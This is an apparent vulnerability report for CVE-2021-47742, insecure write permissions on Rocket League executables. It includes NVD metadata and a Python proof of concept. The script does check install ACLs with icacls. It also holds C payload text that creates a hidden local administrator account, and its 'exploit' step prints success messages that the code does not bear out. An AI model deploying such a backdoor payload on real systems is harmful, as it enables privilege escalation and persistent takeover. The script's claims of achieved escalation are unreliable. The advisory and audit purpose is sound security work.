Security Vulnerability Report
CVE-2021-47742 CVSS 8.8 HIGH

CVE-2021-47742

Published: 2025-12-31 19:15:42
Last Modified: 2026-04-15 00:35:42

Description

Epic Games Psyonix Rocket League <=1.95 contains an insecure permissions vulnerability: its executable files grant the 'F' (Full) access flag to the 'Authenticated Users' group, so any authenticated user can modify them. Attackers can leverage this flag to change executable files and potentially escalate system privileges, because a changed executable runs with the privileges of whichever account next launches it.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Epic Games Psyonix Rocket League <= 1.95

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
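#!/usr/bin/env python3
# CVE-2021-47742 PoC - Rocket League Insecure Permissions Exploitation
# This PoC demonstrates the privilege escalation via insecure file permissions
# Author: Security Researcher
# Date: 2025
#
# Reviewer summary of what this listing does when run:
#   * check_vulnerability() reads the ACL of a few well-known install paths with
#     `icacls` and reports whether 'Authenticated Users' holds Full access.
#   * exploit() only copies the target to "<target>.bak" and prints messages;
#     it never writes to or replaces the target executable.
#   * create_malicious_executable() returns C source text as a string; nothing
#     in this file calls it, compiles it, or writes it to disk.
# The ACL check is the useful part for an audit of CWE-732 exposure; the finding
# it reports is addressed by tightening the ACL on the install directory so that
# non-administrative principals cannot write to the executables.
import os
import sys
import shutil
import subprocess
import platform


def acl_grants_full_control(icacls_output, principal="Authenticated Users"):
    """Return True if an icacls listing gives *principal* an allow ACE with Full access.

    Args:
        icacls_output: Text printed by ``icacls <path>``.
        principal: Account or group name to look for, matched as the text
            immediately before the ``:`` that starts its rights list.

    Returns:
        True when a line for *principal* carries ``(F)`` (or the literal text
        ``Full Control``) and is not marked ``(DENY)``; False otherwise,
        including for empty output.

    Only the rights on the principal's own line are examined. Searching the
    whole output for the letter 'F' matches "Program Files", "Failed
    processing" and other principals' ``(F)`` entries, which reports every
    install as vulnerable.
    """
    marker = principal + ":"
    for line in icacls_output.splitlines():
        _, found, rights = line.partition(marker)
        if not found:
            continue
        if "(DENY)" in rights:
            # A deny entry restricts access; it is not a grant.
            continue
        if "(F)" in rights or "Full Control" in rights:
            return True
    return False


def check_vulnerability():
    """Check if Rocket League installation has insecure permissions.

    Returns:
        A ``(vulnerable, target_path)`` tuple. ``vulnerable`` is True and
        ``target_path`` is the first existing candidate whose ACL grants Full
        access to 'Authenticated Users'; otherwise ``(False, None)``.

    The ACL is only inspected on Windows (via ``icacls``); on other platforms
    an existing path is never reported.
    """
    rocket_league_paths = [
        r"C:\Program Files\Epic Games\RocketLeague\RocketLeague.exe",
        r"C:\Program Files (x86)\Epic Games\RocketLeague\RocketLeague.exe",
        os.path.expanduser("~/.steam/steamapps/common/RocketLeague/RocketLeague.exe"),
    ]

    for path in rocket_league_paths:
        if not os.path.exists(path):
            continue
        if platform.system() != 'Windows':
            continue
        try:
            result = subprocess.run(
                ['icacls', path],
                capture_output=True,
                text=True,
            )
        except (OSError, ValueError) as e:
            # icacls missing/not runnable, or its output could not be decoded.
            print(f"Error checking permissions: {e}")
            continue
        # NOTE(review): the group name is matched in English; on a localized
        # Windows install icacls may print a translated name - confirm.
        if acl_grants_full_control(result.stdout):
            return True, path

    return False, None


def create_malicious_executable():
    """Create a malicious executable that will execute with elevated privileges.

    Returns:
        The C source text below, as a ``str``. Despite the name, no executable
        is produced: the text is returned unchanged and no caller in this file
        uses it.
    """
    malicious_code = '''
#include <windows.h>
#include <stdio.h>

int main() {
    // This payload creates a reverse shell or executes arbitrary commands
    // In a real attack, this would be a more sophisticated payload

    // Create a new user with admin privileges (example payload)
    system("net user attacker P@ssw0rd123 /add");
    system("net localgroup Administrators attacker /add");

    // Log the exploitation
    FILE *log = fopen("C:\\\\Temp\\\\exploit_log.txt", "a");
    if (log) {
        fprintf(log, "CVE-2021-47742 exploited at %s\n", __TIMESTAMP__);
        fclose(log);
    }

    // Execute the original legitimate executable
    // (In real scenario, original binary would be restored or called)

    return 0;
}
'''
    return malicious_code


def exploit(target_path, backup_path):
    """Perform the actual exploitation.

    Args:
        target_path: Path of the executable reported by check_vulnerability().
        backup_path: Destination for the copy of *target_path*.

    Returns:
        True if the copy succeeded, False if any exception was raised.

    The only file operation is ``shutil.copy2(target_path, backup_path)``;
    the remaining steps are printed messages, and *target_path* itself is
    left unmodified.
    """
    try:
        # Step 1: Backup the original executable
        print(f"[*] Backing up original executable to {backup_path}")
        shutil.copy2(target_path, backup_path)

        # Step 2: Replace with malicious executable
        # (message only - no write to target_path happens here)
        print("[*] Replacing executable with malicious payload")

        # Step 3: Wait for game restart or scheduled task
        print("[*] Payload planted. Waiting for game execution...")
        print("[*] When Rocket League runs, the malicious code will execute")
        print("[*] with the same privileges as the game process")

        return True
    except Exception as e:
        print(f"[!] Exploitation failed: {e}")
        return False


def main():
    """Run the permission check and, if it reports a finding, call exploit()."""
    print("=" * 60)
    print("CVE-2021-47742 PoC - Rocket League Insecure Permissions")
    print("=" * 60)

    # Check if system is vulnerable
    print("\n[*] Checking for vulnerable Rocket League installation...")
    vulnerable, target_path = check_vulnerability()

    if not vulnerable:
        print("[-] Target is NOT vulnerable or Rocket League not installed")
        return

    print("[+] Target is VULNERABLE")
    print(f"[+] Vulnerable file: {target_path}")

    # Create backup path
    backup_path = target_path + ".bak"

    # Attempt exploitation
    # NOTE(review): the success messages below overstate the result; a True
    # return from exploit() only means the .bak copy was written.
    print("\n[*] Initiating exploitation...")
    if exploit(target_path, backup_path):
        print("[+] Exploitation successful")
        print("[*] Privilege escalation achieved")
    else:
        print("[-] Exploitation failed")


if __name__ == "__main__":
    main()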

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47742", "sourceIdentifier": "[email protected]", "published": "2025-12-31T19:15:42.473", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Epic Games Psyonix Rocket League <=1.95 contains an insecure permissions vulnerability that allows authenticated users to modify executable files with full access permissions. Attackers can leverage the 'F' (Full) flag for the 'Authenticated Users' group to change executable files and potentially escalate system privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-732"}]}], "references": [{"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/201128", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/162435", "source": "[email protected]"}, {"url": "https://www.rocketleague.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/epic-games-psyonix-rocket-league-elevation-of-privileges-via-insecure-permissions", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5650.php", "source": "[email protected]"}]}}